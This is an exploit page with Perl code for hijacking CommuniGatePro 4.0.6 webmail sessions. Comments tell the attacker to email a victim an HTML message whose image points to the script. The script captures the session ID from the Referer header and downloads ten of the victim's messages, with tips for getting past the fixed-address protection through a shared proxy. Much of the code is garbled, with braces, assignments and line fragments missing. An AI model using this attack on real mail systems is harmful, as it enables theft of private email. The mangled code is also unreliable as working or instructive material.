CommuniGatePro webmail version 4.0.6 session hijacking exploit

     * Version TXT Disponible ici *

                              # Below is exploit code. Place it into cgi-bin, then
                              # (recommended) make symlink from
                              # DocumentRoot/AnyImage.gif to, configure
                              # at least $url variable, and possible other vars and
                              # send victim HTML message with img src to your
                              # AnyImage.gif. When victim will read message, script
                              # will download messages 1..10 from his mailbox (if
                              # sucessfull).

                              # Script will work even if "require fixed address" option
                              # enabled (set $abuseproxy=1), but it needs access to
                              # users proxy (IP will be detected automatically). So, if
                              # your victim uses same corporate proxy as you, then 
                              # you're lucky, you can own his mailbox! :)

                              # If victim uses HTTPS to access CGP webmail, use
                              # https:// link to image. some browsers will still send
                              # HTTP_REFERER if _both_ sites are https.
                              # session hijacking and mail downloading exploit for CommuniGatePro 4.0.6
                              # Yaroslav Polyakov.

                              use LWP::UserAgent;

                              # configuration vars

                              sub printgif

                              print "Content-Type: image/gif\n";
                              print "\n";
                              print "$gif1x1";

                              open LOG, "> $logfile" || die("cant write to my log");

                              print LOG "remote: $remote\nreferer: $referer\n";
                              # if($referer=~/SID=([0-9a-zA-Z\-]+)/){
                              print LOG "SID: $SID\n";
                                print LOG "sorry, cant
                              find out SID\n";

                              # create request
                              my $ua = new LWP::UserAgent;
                              $ua->agent("shj - sysAttack CGP session HiJack/1.0");

                              print LOG "set proxy

                              $eurl =~ s/%N%/$index/;
                              $eurl =~ s/%SID%/$SID/;
                              print LOG "fetching $eurl\n";
                              $request = new HTTP::Request("GET", $eurl);
                              $response = $ua->request($request);
                                print LOG
                              $response->code." ".$response->message
                                open MSG, ">
                              $msgprefix$index" or die('cant crea
                              te $msgprefix$index');
                                print MSG
                                close MSG;
                                print LOG "undefined
                              close LOG;



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